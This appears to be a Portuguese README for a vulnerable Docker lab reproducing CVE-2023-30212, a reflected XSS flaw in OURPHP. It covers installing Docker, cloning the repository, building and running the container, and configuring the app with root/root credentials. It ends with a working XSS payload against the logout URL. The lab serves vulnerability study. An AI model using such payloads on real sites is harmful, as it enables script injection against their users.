
Isto contém os arquivos necessários e Docker para replicar uma vulnerabilidade no OURPHP que tem uma vulnerabilidade XSS (CVE-2023-30212)
Isso contém os diretórios necessários e o Dockerfile para replicar uma vulnerabilidade no OURPHP que possui uma vulnerabilidade XSS (CVE-2023-30212).
PRÉ-REQUISITOS
Baixe o Docker
sudo apt install -y docker.io
Baixe os arquivos deste repositório usando git clone
git clone https://github.com/VisDev23/Vulnerable-Docker--CVE-2023-30212-.git .
Isso contém os diretórios necessários e o Dockerfile para replicar o cenário.
Após baixar os arquivos, construa uma imagem docker usando
sudo docker build -t <Give_Suitable_Docker_name> . .
! Adicione um nome à imagem Docker para que possa ser chamada posteriormente.
Converta a imagem Docker em um contêiner usando
sudo docker run -d -p 80:80 <Docker_Image_Name> .
! Aqui a porta do contêiner está mapeada para a porta 80.
Para ver o status do contêiner docker,
sudo docker ps
Após realizar esses passos,
Acesse o localhost e configure o OURPHP com as seguintes credenciais. Usuário: root Senha: root Nome do Banco de Dados: data
Agora você precisa configurar o nome de usuário e senha para Administração. Defina o seguinte: Usuário: root Senha: root e prossiga
Então nosso payload é
/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert("xss")</script>
adicione isso junto com localhost ou 127.0.0.1 para acionar o XSS.